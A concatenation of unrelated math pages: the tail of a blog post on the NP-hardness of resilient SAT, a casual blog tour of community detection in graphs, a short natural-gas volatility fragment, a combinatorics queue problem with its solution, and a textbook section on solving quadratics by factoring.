$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{4}{3}$
$b\left(4b+5\right)=0$
$x\left(2x+1\right)\left(2x+8\right)=0$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\text{\hspace{0.17em}}\frac{1}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}0$
$y\left(5y+2\right)\left(2y-1\right)=0$
${\left(x-8\right)}^{2}=0$
$x=8$
${\left(x-2\right)}^{2}=0$
${\left(b+7\right)}^{2}=0$
$b=-7$
${\left(a+1\right)}^{2}=0$
$x{\left(x-4\right)}^{2}=0$
$x=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}4$
$y{\left(y+9\right)}^{2}=0$
$y{\left(y-7\right)}^{2}=0$
$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
$y{\left(y+5\right)}^{2}=0$
${x}^{2}-4=0$
$x=-2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}2$
${x}^{2}+9=0$
${x}^{2}+36=0$
no solution
${x}^{2}-25=0$
${a}^{2}-100=0$
$a=-10,\text{\hspace{0.17em}}\text{\hspace{0.17em}}10$
${a}^{2}-81=0$
${b}^{2}-49=0$
$b=7,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-7$
${y}^{2}-1=0$
$3{a}^{2}-75=0$
$a=5,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-5$
$5{b}^{2}-20=0$
${y}^{3}-y=0$
$y=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
${a}^{2}=9$
${b}^{2}=4$
$b=2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-2$
${b}^{2}=1$
${a}^{2}=36$
$a=6,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-6$
$3{a}^{2}=12$
$-2{x}^{2}=-4$
$x=\sqrt{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\sqrt{2}$
$-2{a}^{2}=-50$
$-7{b}^{2}=-63$
$b=3,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
$-2{x}^{2}=-32$
$3{b}^{2}=48$
$b=4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-4$
${a}^{2}-8a+16=0$
${y}^{2}+10y+25=0$
$y=-5$
${y}^{2}+9y+16=0$
${x}^{2}-2x-1=0$
no solution
${a}^{2}+6a+9=0$
${a}^{2}+4a+4=0$
$a=-2$
${x}^{2}+12x=-36$
${b}^{2}-14b=-49$
$b=7$
$3{a}^{2}+18a+27=0$
$2{m}^{3}+4{m}^{2}+2m=0$
$m=0,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
$3m{n}^{2}-36mn+36m=0$
${a}^{2}+2a-3=0$
$a=-3,\text{\hspace{0.17em}}\text{\hspace{0.17em}}1$
${a}^{2}+3a-10=0$
${x}^{2}+9x+14=0$
$x=-7,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-2$
${x}^{2}-7x+12=3$
${b}^{2}+12b+27=0$
$b=-9,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
${b}^{2}-3b+2=0$
${x}^{2}-13x=-42$
$x=6,\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
${a}^{3}=-8{a}^{2}-15a$
$6{a}^{2}+13a+5=0$
$a=-\frac{5}{3},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-\frac{1}{2}$
$6{x}^{2}-4x-2=0$
$12{a}^{2}+15a+3=0$
$a=-\frac{1}{4},\text{\hspace{0.17em}}\text{\hspace{0.17em}}-1$
$18{b}^{2}+24b+6=0$
$12{a}^{2}+24a+12=0$
$a=-1$
$4{x}^{2}-4x=-1$
$2{x}^{2}=x+15$
$x=-\frac{5}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}3$
$4{a}^{2}=4a+3$
$4{y}^{2}=-4y-2$
no solution
$9{y}^{2}=9y+18$
Exercises for review
( [link] ) Simplify ${\left({x}^{4}{y}^{3}\right)}^{2}{\left(x{y}^{2}\right)}^{4}.$
${x}^{12}{y}^{14}$
( [link] ) Write ${\left({x}^{-2}{y}^{3}{w}^{4}\right)}^{-2}$ so that only positive exponents appear.
( [link] ) Find the sum: $\frac{x}{{x}^{2}-x-2}+\frac{1}{{x}^{2}-3x+2}.$
$\frac{{x}^{2}+1}{\left(x+1\right)\left(x-1\right)\left(x-2\right)}$
( [link] ) Simplify $\frac{\frac{1}{a}+\frac{1}{b}}{\frac{1}{a}-\frac{1}{b}}.$
( [link] ) Solve $\left(x+4\right)\left(3x+1\right)=0.$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{-1}{3}$
how can chip be made from sand
is this allso about nanoscale material
Almas
are nano particles real
yeah
Joseph
Hello, if I study Physics teacher in bachelor, can I study Nanotechnology in master?
no can't
Lohitha
where is the latest information on a no technology how can I find it
William
currently
William
where we get a research paper on Nano chemistry....?
nanopartical of organic/inorganic / physical chemistry , pdf / thesis / review
Ali
what are the products of Nano chemistry?
There are lots of products of nano chemistry... Like nano coatings.....carbon fiber.. And lots of others..
learn
Even nanotechnology is pretty much all about chemistry... Its the chemistry on quantum or atomic level
learn
da
no nanotechnology is also a part of physics and maths it requires angle formulas and some pressure regarding concepts
Bhagvanji
hey
Giriraj
Preparation and Applications of Nanomaterial for Drug Delivery
revolt
da
Application of nanotechnology in medicine
has a lot of application modern world
Kamaluddeen
yes
narayan
what is variations in raman spectra for nanomaterials
ya I also want to know the raman spectra
Bhagvanji
I only see partial conversation and what's the question here!
what about nanotechnology for water purification
please someone correct me if I'm wrong but I think one can use nanoparticles, specially silver nanoparticles for water treatment.
Damian
yes that's correct
Professor
I think
Professor
Nasa has use it in the 60's, copper as water purification in the moon travel.
Alexandre
nanocopper obvius
Alexandre
what is the stm
is there industrial application of fullrenes. What is the method to prepare fullrene on large scale.?
Rafiq
industrial application...? mmm I think on the medical side as drug carrier, but you should go deeper on your research, I may be wrong
Damian
How we are making nano material?
what is a peer
What is meant by 'nano scale'?
What is STMs full form?
LITNING
scanning tunneling microscope
Sahil
how nano science is used for hydrophobicity
Santosh
Do u think that Graphene and Fullrene fiber can be used to make Air Plane body structure the lightest and strongest. Rafiq
Rafiq
what is differents between GO and RGO?
Mahi
what is simplest way to understand the applications of nano robots used to detect the cancer affected cell of human body.? How this robot is carried to required site of body cell.? what will be the carrier material and how can be detected that correct delivery of drug is done Rafiq
Rafiq
if virus is killing to make ARTIFICIAL DNA OF GRAPHENE FOR KILLED THE VIRUS .THIS IS OUR ASSUMPTION
Anam
analytical skills graphene is prepared to kill any type viruses .
Anam
Any one who tell me about Preparation and application of Nanomaterial for drug Delivery
Hafiz
what is Nano technology ?
write examples of Nano molecule?
Bob
The nanotechnology is as new science, to scale nanometric
brayan
nanotechnology is the study, desing, synthesis, manipulation and application of materials and functional systems through control of matter at nanoscale
Damian
how did you get the value of 2000N.What calculations are needed to arrive at it
Privacy Information Security Software Version 1.1a
Good
Got questions? Join the online conversation and get instant answers!
|
|
# Semi-Standard Young Diagrams and Families
In connection with string theory I encountered the following problem:
Given the set M_N of all semi-standard Young tableaux of size N (i.e. all fillings of Ferrers diagrams with natural numbers with weakly increasing rows and strictly increasing columns, the content of which sum to N).
The conjecture, which I cannot prove and for which I know no counterexample states:
M_N is the union of disjoint families, where each family consists of a father diagram and all his daughters, which are obtained from the father diagram by deletion of one box.
The conjecture holds for N<=8
http://www.itp.uni-hannover.de/~dragon/young.pdf
There numbers a,b are attached to the Ferrers diagrams, where a is the number of semi-standard Young Tableaux of size N and b the number of fathers, who remain after the daughters have filled up their families.
Light cone string theory proves that the conjecture holds for all M_N with less than 25 rows, i.e. for N < 325. But string theory provides no counterexample for N >= 325.
Any suggestions, e.g. how to compute the number a(N,lambda) of Young diagrams with size N and shape lambda, would be helpful.
Norbert Dragon
I use standard facts about symmetric functions that can be found, e.g, in Chapter 7 of Enumerative Combinatorics, vol. 2. Let $s_\lambda$ denote a Schur function and $p_1=s_1=x_1+x_2+\cdots$. Then $\frac{\partial s_\lambda}{\partial p_1}=\sum_\mu s_\mu$, where the $\mu$'s are obtained by removing a single box from $\lambda$. Moreover, the coefficient of $q^n$ in $s_\lambda(q,q^2,q^3,\dots)$ is equal to the number of SSYT with entries summing to $n$. Thus if we let $c_n$ be the coefficient of $q^n$ in the symmetric function $f$ defined by $$f+\frac{\partial}{\partial p_1}f = \sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots),$$ and if $c_n=\sum a_{\mu,n}s_\mu$, then we need $a_{\mu,n}$ copies of the shape $\mu$ in a set of fathers generating all SSYT with entries summing to $n$. Hence we need to show that $a_{\mu,n}\geq 0$. Now $$\sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots) = \exp \sum_{n\geq 1} \frac{q^n}{1-q^n}p_n.$$ This leads to a simple linear first-order differential equation with solution $$f = (1-q) \sum_\lambda s_\lambda\cdot s_\lambda(q,q^2,q^3,\dots).$$ If $h_u$ denotes the hook length of the square $u$ of $\lambda$, then $$s_\lambda(q,q^2,q^3,\dots) = \frac{q^{b(\lambda)}}{\prod_{u\in \lambda} (1-q^{h_u})},$$ where $b_\lambda=\sum i\lambda_i$. Since there is always a hook length equal to one, the power series $(1-q)s_\lambda(q,q^2,q^3,\dots)$ will be a product of factors of the form $1/(1-q^h)$, $h\geq 1$, so will have nonnegative coefficients as desired. Thus we have not just an existence proof, but a precise generating function for the number of fathers of each shape.
|
|
Creating macro cross references
Is there any tool that allows me to analyze/see/display macro dependencies?
To be clear: After
\def\a{\b\c}
\def\b{\x\c}
I'd like to get that \a uses \b and \c and that \b uses \x and \c, best nicely displayed. And to make me entirely happy: the tool should also tell me that \a was defined in file X at line Y...
Slightly editing my answer to your other related question, Q: Loop over all tokens in the body of a macro.
\documentclass{article}
\usepackage[T1]{fontenc}
\usepackage{lmodern}
\let\enddependency\relax
\let\test\relax
\newcommand\dependency[1]{The macro \string#1 contains these dependencies:%
\expandafter\dependencyaux#1\enddependency\par}
\def\dependencyaux#1#2\enddependency{%
\ifcat\relax\noexpand#1 \string#1\fi
\ifx\enddependency#2\else\dependencyaux#2\enddependency\fi%
}
\begin{document}
\def\a{ blah \b de-blah-blah \c}
\def\b{\x{\c}}
\dependency{\a}
\dependency{\b}
\end{document}
|
|
# Math Help - Another solid of revolution, thanks
1. ## Another solid of revolution, thanks
I have now another problem, alike to my previous posted, but I'm confused since I get a negative results, wich is impossible, that means I have a mistake somewhere:
I have to find the solid of revolution by rotating about x axis the area bounded by y=sec(x) , y=1, x = -1 and x = 1;
the area would be pi(sec^2(x) - 1) and the volume is the integral from -1 to 1; how do I evaluate these x-values to integrate the function?
thanks
2. ## Re: Another solid of revolution, thanks
The region bounded by those curves is rather small! And the simplest way to find the volume rotated around the x-axis is to do it as two integrals. The volumes bounded above by y= sec(x), below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1 sec^2(x) dx$. The volume bounded above by y= 1, below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1dx= 2\pi$ (actually the volume of a cylinder with radius 1 and height 2). The volume you want is the difference between those two. That is the same as $\pi \int_{-1}^1 (sec^2(x)- 1) dx$.
That is based on the fact that the volume of a cylindrical "donut" with inner radius r, outer radius R, and height h, is $\pi(R^2- r^2)$ which is the same as the volume of the whole cylinder, $\pi R^2h$ minus the volume of the inner cylinder, $\pi r^2h$.
3. ## Re: Another solid of revolution, thanks
Originally Posted by HallsofIvy
The region bounded by those curves is rather small! And the simplest way to find the volume rotated around the x-axis is to do it as two integrals. The volumes bounded above by y= sec(x), below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1 sec^2(x) dx$. The volume bounded above by y= 1, below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1dx= 2\pi$ (actually the volume of a cylinder with radius 1 and height 2). The volume you want is the difference between those two. That is the same as $\pi \int_{-1}^1 (sec^2(x)- 1) dx$.
That is based on the fact that the volume of a cylindrical "donut" with inner radius r, outer radius R, and height h, is $\pi(R^2- r^2)$ which is the same as the volume of the whole cylinder, $\pi R^2h$ minus the volume of the inner cylinder, $\pi r^2h$.
and by solving this integral I did the following $\pi \int_{-1}^1 (sec^2(x)- 1) dx =$
$2\pi \int_{0}^{1} (sec^2(x)- 1) dx =$ by symmetry
$2\pi (tan(x) - x)_{0}^{1} =$ which gives me
$2\pi ( \frac{\pi}{4} - 1) =$ , which is negative... what am I doing wrong,
even if I evaluate the integral otherwise $\pi \int_{-1}^1 (sec^2(x)- 1) dx = \pi \int_{-1}^1 (tan^2(x)) dx$
which is $2\pi (tan(x) - x)_{0}^{1} =$ gives me the same results...
|
|
# LaTeX w00t!
Standard
Image via Wikipedia
I owe Professor Paul A. Rubin another apology – turns out I can display LaTeX natively in a wordpress.com blog after all – as the following wave equation shows:
$i\hbar\frac{\partial}{\partial t}\left|\Psi(t)\right>=H\left|\Psi(t)\right>$
## 2 thoughts on “LaTeX w00t!”
1. Just remember, the conversion rate is 2 apologies : 1 beer (imperial pint).
• Let me know when you are next in London, I always pay my debts.
|
|
## Applications of Integration: Force Due to Fluid Pressure
I'm working on a particular problem that involves the force on a face of a triangular prism. What I am wondering is if someone could explain how to find dA for the prism? If the prism is an equilateral triangle, then $dA=\sqrt3dy$ doesn't it? My book is showing that the area is $2\sqrt3ydy$ and I really cannot see how...
|
|
# The initial abundance and distribution of 92Nb in the Solar System
Tsuyoshi Iizuka, Yi-Jen Lai, Waheed Akram, Yuri Amelin, Maria Schönbächler
Earth and Planetary Science Letters
Available online 11 February 2016
doi:10.1016/j.epsl.2016.02.005
Updated: February 11, 2016
“Niobium-92 is an extinct proton-rich nuclide, which decays to 92Zr with a half-life of 37 Ma. This radionuclide potentially offers a unique opportunity to determine the timescales of early Solar System processes and the site(s) of nucleosynthesis for p-nuclei, once its initial abundance and distribution in the Solar System are well established. Here we present internal Nb-Zr isochrons for three basaltic achondrites with known U-Pb ages: the angrite NWA 4590, the eucrite Agoult, and the ungrouped achondrite Ibitira. Our results show that the relative Nb-Zr isochron ages of the three meteorites are consistent with the time intervals obtained from the Pb-Pb chronometer for pyroxene and plagioclase, indicating that 92Nb was homogeneously distributed among their source regions. The Nb-Zr and Pb-Pb data for NWA 4590 yield the most reliable and precise reference point for anchoring the Nb-Zr chronometer to the absolute timescale: an initial 92Nb/93Nb ratio of $(1.4 \pm 0.5) \times 10^{-5}$ at $4557.93 \pm 0.36$ Ma, which corresponds to a 92Nb/93Nb ratio of $(1.7 \pm 0.6) \times 10^{-5}$ at the time of the Solar System formation. On the basis of this new initial ratio, we demonstrate the capability of the Nb-Zr chronometer to date early Solar System objects including troilite and rutile, such as iron and stony-iron meteorites. Furthermore, we estimate a nucleosynthetic production ratio of 92Nb to the p-nucleus 92Mo between 0.0015 and 0.035. This production ratio, together with the solar abundances of other p-nuclei with similar masses, can be best explained if these light p-nuclei were primarily synthesized by photodisintegration reactions in Type Ia supernovae. ”
|
|
# ${\boldsymbol m}_{{{\boldsymbol u}}}/{\boldsymbol m}_{{{\boldsymbol d}}}$ MASS RATIO INSPIRE search
VALUE DOCUMENT ID TECN COMMENT
$\bf{ 0.48 {}^{+0.07}_{-0.08}}$ OUR EVALUATION
$0.485$ $\pm0.011$ $\pm0.016$ 1
2016
LATT
$0.4482$ ${}^{+0.0173}_{-0.0206}$ 2
2015
LATT
$0.470$ $\pm0.056$ 3
2014
LATT
$0.698$ $\pm0.051$ 4
2012
LATT
$0.42$ $\pm0.01$ $\pm0.04$ 5
2010
LATT
$0.4818$ $\pm0.0096$ $\pm0.0860$ 6
2010
LATT
$0.550$ $\pm0.031$ 7
2007
LATT
• • • We do not use the following data for averages, fits, limits, etc. • • •
$0.43$ $\pm0.08$ 8
2004 A
LATT
$0.410$ $\pm0.036$ 9
2003
LATT
$0.553$ $\pm0.043$ 10
1996
THEO Compilation
1 FODOR 2016 is a lattice simulation with ${{\mathit N}_{{f}}}$ = 2 + 1 dynamical flavors and includes partially quenched QED effects.
2 BASAK 2015 is a lattice computation using 2+1 dynamical quark flavors.
3 CARRASCO 2014 is a lattice QCD computation of light quark masses using 2 + 1 + 1 dynamical quarks, with ${{\mathit m}_{{u}}}$ = ${{\mathit m}_{{d}}}{}\not=$ ${{\mathit m}_{{s}}}{}\not=$ ${{\mathit m}_{{c}}}$. The ${\mathit {\mathit u}}$ and ${\mathit {\mathit d}}$ quark masses are obtained separately by using the ${{\mathit K}}$ meson mass splittings and lattice results for the electromagnetic contributions.
4 AOKI 2012 is a lattice computation using 1 + 1 + 1 dynamical quark flavors.
5 BAZAVOV 2010 is a lattice computation using 2+1 dynamical quark flavors.
6 BLUM 2010 is a lattice computation using 2+1 dynamical quark flavors.
7 BLUM 2007 determine quark masses from the pseudoscalar meson masses using a QED plus QCD lattice computation with two dynamical quark flavors.
8 AUBIN 2004A perform three flavor dynamical lattice calculation of pseudoscalar meson masses, with continuum estimate of electromagnetic effects in the kaon masses.
9 NELSON 2003 computes coefficients in the order $\mathit p{}^{4}$ chiral Lagrangian using a lattice calculation with three dynamical flavors. The ratio ${\mathit m}_{{{\mathit u}}}/{\mathit m}_{{{\mathit d}}}$ is obtained by combining this with the chiral perturbation theory computation of the meson masses to order $\mathit p{}^{4}$.
10 LEUTWYLER 1996 uses a combined fit to ${{\mathit \eta}}$ $\rightarrow$ 3 ${{\mathit \pi}}$ and ${{\mathit \psi}^{\,'}}$ $\rightarrow$ ${{\mathit J / \psi}}$ (${{\mathit \pi}},{{\mathit \eta}}$) decay rates, and the electromagnetic mass differences of the ${{\mathit \pi}}$ and ${{\mathit K}}$.
${\mathit m}_{{{\mathit u}}}/{\mathit m}_{{{\mathit d}}}$ MASS RATIO
References:
FODOR 2016
PRL 117 082001 Up and Down Quark Masses and Corrections to Dashen's Theorem from Lattice QCD and Quenched QED
BASAK 2015
JPCS 640 012052 Electromagnetic Effects on the Light Hadron Spectrum
CARRASCO 2014
NP B887 19 Up, Down, Strange and Charm Quark Masses with $\mathit N_{f}$ = 2+1+1 Twisted Mass Lattice QCD
AOKI 2012
PR D86 034507 1+1+1 Flavor QCD + QED Simulation at the Physical Point
BAZAVOV 2010
RMP 82 1349 Full Nonperturbative QCD Simulations with 2+1 Flavors of Improved Staggered Quarks
BLUM 2010
PR D82 094508 Electromagnetic Mass Splittings of the Low Lying Hadrons and Quark Masses from 2+1 Flavor Lattice QCD+QED
BLUM 2007
PR D76 114508 Determination of Light Quark Masses from the Electromagnetic Splitting of Pseudoscalar Meson Masses Computed with Two Flavors of Domain Wall Fermions
AUBIN 2004A
PR D70 114501 Light Pseudoscalar Decay Constants, Quark Masses, and Low Energy Constants from three-flavor Lattice QCD
NELSON 2003
PRL 90 021601 Up Quark Mass in Lattice QCD with Three Light Dynamical Quarks and Implications for Strong $\mathit CP$ Invariance
LEUTWYLER 1996
PL B378 313 The Ratios of the Light Quark Masses
|
|
# Last three numbers of multiple of four primes
If we have four two-digit prime numbers $$p_1$$, $$p_2$$, $$p_3$$ and $$p_ 4$$ such that they all end with a different number. For example 11, 13, 17 and 19. What can be the last three digits of $$p_1p_2p_3p_4$$? It is pretty obvious that the last digit has to be $$9$$ since $$1\cdot3\cdot7\cdot9 \equiv 9$$ (mod $$10$$), but I have a tough time figuring out that this number can be mod $$1000$$.
• There are only a few two-digit prime numbers. – Dietrich Burde Apr 14 at 18:51
• By my count there are $750$ possible products. Can you enumerate them? – Oscar Lanzi Apr 14 at 22:47
Here is a program in Ocaml that checks it I think:
let whatweneed=[[11;31;41;61;71];[13;23;43;53;73;83];[17;37;47;67;97];[19;29;59;79; 89]]
let rec makelists ll =
match ll with
|q::w -> [q]::makelists w
|[] -> []
let rec appendele l1 l2=
match l1 with
|q::w -> (List.map (fun x -> q::x) l2) @ (appendele w l2)
|[]->[]
let rec oneineach ss=
match ss with
|q::w ->appendele q (oneineach w)
|_->[[]]
let combinations = oneineach whatweneed
let multall= List.map (fun y -> (List.fold_left (fun acc x->acc*x) 1 y)) combinations
let multallmodthousand = List.map (fun x -> x mod 1000) multall
let rec removeDuplicates lst =
match lst with
| [] -> []
| x :: xs -> x :: (List.filter (fun u -> not (u = x)) (removeDuplicates xs));;
let finalresult = removeDuplicates multallmodthousand
Here are the results:
$$[189; 499; 429; 49; 359; 529; 439; 169; 989; 899; 699; 909; 539; 959; 39; 849; 279; 709; 549; 259; 389; 809; 519; 719; 729; 759; 779; 789; 859; 469; 299; 129; 929; 839; 569; 69; 579; 109; 639; 689; 919; 739; 149; 419; 239; 649; 559; 589; 629; 249; 769; 979; 599; 409; 309; 749; 969; 79; 819; 619; 659; 679; 159; 509; 369; 879; 939; 949; 489; 219; 229; 289; 89; 269; 99; 319; 209; 339; 19; 29; 59; 139; 479; 669; 329; 999; 829; 349; 399; 199; 459; 889; 799; 9; 379; 449; 869; 119; 609; 179]$$
|
|
# Is it possible that in a metric space $(X, d)$ with more than one point, the only open sets are $X$ and $\emptyset$?
Is it possible that in a metric space $(X, d)$ with more than one point, the only open sets are $X$ and $\emptyset$?
I don't think this is possible in $\mathbb{R}$, but are there any possible metric spaces where that would be true?
-
One of the axioms is that for $x, y \in X$ we have $d(x, y) = 0$ if and only if $x = y$. So if you have two distinct points, you should be able to find an open ball around one of them that does not contain the other.
-
Extend this a little further and you've proved metric spaces are Hausdorff. – dls Nov 30 '11 at 19:55
Thanks, that's awesome! How can you be sure that such an open set exists in all metric spaces? What if the open ball around x must include other elements, and the sum of those open balls must go back to X? – dhz Nov 30 '11 at 20:01
@dhz Open balls come with every metric space -- they're how you define the (base for the) topology! – Dylan Moreland Nov 30 '11 at 20:03
@DylanMoreland What I meant was, how can you be sure that such an open set exists in all metric spaces of more than one element? What if the open ball around x must include other elements, an the sum of those open balls add back to X? Not sure if that makes sense, but basically I'm having trouble going from ball B to open subset U. – dhz Nov 30 '11 at 20:08
@dhz Hm. I'm not sure what you mean. Of course, it may be, as in $\mathbf{R}$, that every open ball contains more than one element. But these sets of the form $B(x, r) = \{y \in X : d(x, y) < r\}$ are always open. – Dylan Moreland Nov 30 '11 at 20:12
|
|
Library to convert co-ordinates between the (UK) Ordnance Survey National Grid and latitude/longitude
## Description
This package allowd the user to manipulate co-ordinates on the Earth’s surface in the two major co-ordinate systems: latitude / longitude measured in degrees, and cartographic systems, measured in eastings and northings, based on a local ellipsoidal approximation to the Earth’s geoid.
In particular, it provides tools for processing coordinates (of the form AB 12345 12345) based on the National Grid, defined by the UK Ordnance Survey. For more information, see the Ordnance Survey’s National Grid FAQ page.
The package provides basic functions to convert latitude / longitude to the National Grid and vice versa. However, underneath this is a comprehensive system for mapping, and transforming between different co-ordinate systems, including those for the UK, the Republic of Ireland, France, North America, and Japan.
## Simple Conversion
OSGridConverter. latlong2grid (latitude, longitude, tag = ‘WGS84’)
Converts from latitude / longitude to an OS Grid Reference.
latitude:
The latitude of the point, expressed in decimal degrees North
longitude:
The longitude of the point, expressed in decimal degrees East
tag:
The name of the datum used in the conversion; default is WGS84, referring to the standard datum used by Ordnance Survey
Return value is an OSGridReference object. For the purpose of simple conversions, what matters is that, of g is such an object, then g.E and g.N are respectively its easting and northing, expressed in metres, and str(g) returns the formatted National Grid reference.
Example:
>>> from OSGridConverter import latlong2grid
>>> g=latlong2grid(52.657977,1.716038)
>>> (g.E,g.N)
(651408, 313177)
>>> str(g)
'TG 51408 13177'
OSGridConverter. grid2latlong (grid, tag = ‘WGS84’)
Converts from an OS Grid Reference to latitude / longitude.
grid:
The point to be converted. Either an OSGridReference object, or a string formatted as an Ordnance Survey grid reference, e.g. ‘TG 51408 13177’
tag:
The name of the mapping datum used in the conversion; default is WGS84, referring to the standard datum used by Ordnance Survey
Return value is a LatLong object. For the purpose of simple conversions, what matters is that, of l is such an object, then l.latitude is its latitude expressed oin decimal degrees North, and g.longitude is its longitude expressed in decimal degrees East.
Example:
>>> from OSGridConverter import grid2latlong
>>> l=grid2latlong('TG 51408 13177')
>>> (l.latitude,l.longitude)
(52.65798005789814, 1.7200761111093394)
OSGridConverter. Tags
A list of strings: names of the standing mapping Data that the package is aware of and can convert between. Its members are the valid values that can be used in the tag field of the conversion functions.
Tag
Details
WSG84
UK
OSGB36
Former UK standard (replaced by WGS84)
ED50
UK; used for oil and gas exploration
Irl1975
Republic of Ireland
NTF
France
TokyoJapan
Japan
North America; very similar to WGS84
Note
Conversion from lat / long to grid andthen back to lat / long generally does not end up with the original values.This is due to a combination of internal rounding errors, plus the fact thatthe National Grid resolves points to 10m x 10m squares. In the examples above, the before and after latitudes differ by approx. 1.0e-5 and the longitudes by approx. 3.0e-3; this is typical.
## Project details
Uploaded source
Uploaded py3
|
|
Question
# An electron is moving in a circular path of radius 5.1×10−11 m at a frequency of 6.8×1015 revolutions/sec. The equivalent current is approximately equal to _______.5.1×10−3A1.1×10−3A6.8×10−3A2.2×10−3A
Solution
## The correct option is B 1.1×10−3AGiven: Frequency, v=6.8×1015 rev/s, Time, T=1frequency=16.8×1015s Current is given by: i=QT=1.6×10−19×6.8×1015 =1.1×10−3A.
Suggest corrections
|
|
# Add JS lib function call and store blocks
Efficiency does go pretty downhill when every time you need to run custom JS functions you need to generate new ones. You could store them in variables (lists) or the global space but I believe this is a better option. Allow people to have some sort of "auto execute" when importing libraries or making one (or just do it in an import block, requiring that it is ran first). This will be used to create the functions and store them by name in some library namespace. Then allow those functions to be called both in JS (libname.func...) and from a block without needing to create new functions each time. This is especially since even if the functions were stored in the global namespace, another JS function would need to be used to perform a call. This is also a better alternative to polluting sprite variable namespaces
That's an interesting idea. But what I want to do, a more general solution, is have a block that defines a block:
or something like that. Then the script input could be a JS Function or anything else.
But I see your point that if it's a JS Function it should be callable from JS without going through the JS Function block each time. So maybe a DEFINE JS block that's a cross between my DEFINE and the existing JS Function.
We're reluctant to do auto execute because it means you're running someone else's JS code without a chance to examine it. Maybe as a special case for official libraries.
As for auto-exec, you can just prompt the user the when the library is imported.
Also yes but what I had in mind was more like this:
|new library [name]|
|define [funcname] for [libraryname] as [jsfunction]|
(call [funcname] from [libraryname] [inputs]...>)
|run [funcname] from [libraryname] [inputs]...>|
The library could potentially be inspected from the last call as well (being replaced if using new library with the same name)
I see. The idea of using the library name at runtime is orthogonal to everything else; we could do it for Snap! procedures too. But we haven't felt the need for a module system so far; could you say more about why that part is important?
Its mostly for a few reasons:
1. Efficiency is improved by providing a way to store constant functions and call them instead of making new ones each time
2. Readability is improved as all the inlined functions would be replaced by calls within the block definitions
4. Ability use the paired function from a block or from JS itself.
5. Functions will associate to libraries and have less chance of collisions than if set up the aforementioned ways. They will also be "named," allowing for potential drop-down menus that might show the comment when hovering and allow for easy access (could even select based on the library name). The drop-down could select both the library name and function name as well when empty.
6. Other libraries may be imported (when required and imported alongside the library) and it should not cause issues with loading the libraries.
Okay, your #5 anwers the question. Sigh. We've really been resisting turning Snap! into a heavy-duty industrial language. Dan Garcia wants us to enforce type declarations; you want modules; pretty soon someone will ask for interface templates. I see why an industrial language such as Java needs all those things, but we cherish the idea that an 8-year-old can come to Snap! and start hacking away without the weight of notation to cope with. So the question is how to give you grownups what you want without it getting in kids' faces. I'm proud of how we designed lambda for Snap!, but it took us three tries to get it right.
Anyway, we'll put this on the discussion list, but I'd be happier if you wrote a library we could publish. That's one way to keep industrial-strength features out of kids' faces.
Yea I understand that this isnt something like Roblox where its target development audience is more for teenagers, but this would just allow it to be more useful and run better. I was using this in a few of my projects which are still around learning how to code instead of using Snap! for professional purposes. A good example is a Discord library I was working on for a while where you could interact with webhooks and bots in simple ways.
But the main issues are with clutter and performance problems. Things that these new blocks would alleviate (i can show you the crazy source for some of these blocks). They should not be difficult for children to understand as they would not need to see the inner workings unless they want to know how things work. The library stuff should be non-obtrusive, used only within the custom blocks provided by the library.
On a side note, it would be great if the custom blocks could be categorized in some way either by library or by editing its properties so that they are more well sorted and displayed.
Oh, I see! The library would "publish" blocks that don't have the module name attached. That could work.
By the way, our preference is to construct data structures functionally:
And even if they did see the block source, it will be a bunch of simple function calls with proper naming. If they want to see the library function source they can go and look it up.
The message object internally is a JS dictionary that gets a lot of casting, conversion, and modification done but it would be easier to explain if the functions were just named. Especially since theres some blocks i make only for library purposes which clutter the environment so i don't have to repeat myself in code.
Also, sure, I guess, there could be ways to define blocks using JS sources directly but I believe that it would be more complicated and still create a bunch of blocks that would inevitably be imported. These "libraries" or "modules" would reduce the clutter greatly because they won't create a huge list of blocks. They would just be a part of the library namespace. Its the difference between making a bunch of functions within a JS file and then trying to write code with all those functions in the way VS importing a module with the functions only within the module and they can be looked up when needed.
A lot of my blocks use other blocks ive created like helpers, as I've stated before, so there are dozens of blocks that the developer will never have to use there. There also is the readability which is hard to describe without sending source (I am on mobile and Snap! has really really really bad mobile support so I cant open it).
Although, JS coded blocks would still be a nice feature. I just believe that this library setup will be more useful, especially for "hiding" implementation in a way where its easily accessible but not obtrusive.
Okay, I get it. I can't promise that we'll do anything about it any time soon--we have plenty of missing features already on the list.
Ok. If I had any time aside from other personal projects I would probably just try and make the block myself as a pull request but it would take too long to figure out.
|
|
matplotlib.pyplot.matshow¶
matplotlib.pyplot.matshow(A, fignum=None, **kwargs)[source]
Display an array as a matrix in a new figure window.
The origin is set at the upper left hand corner and rows (first dimension of the array) are displayed horizontally. The aspect ratio of the figure window is that of the array, unless this would make an excessively short or narrow figure.
Tick labels for the xaxis are placed on top.
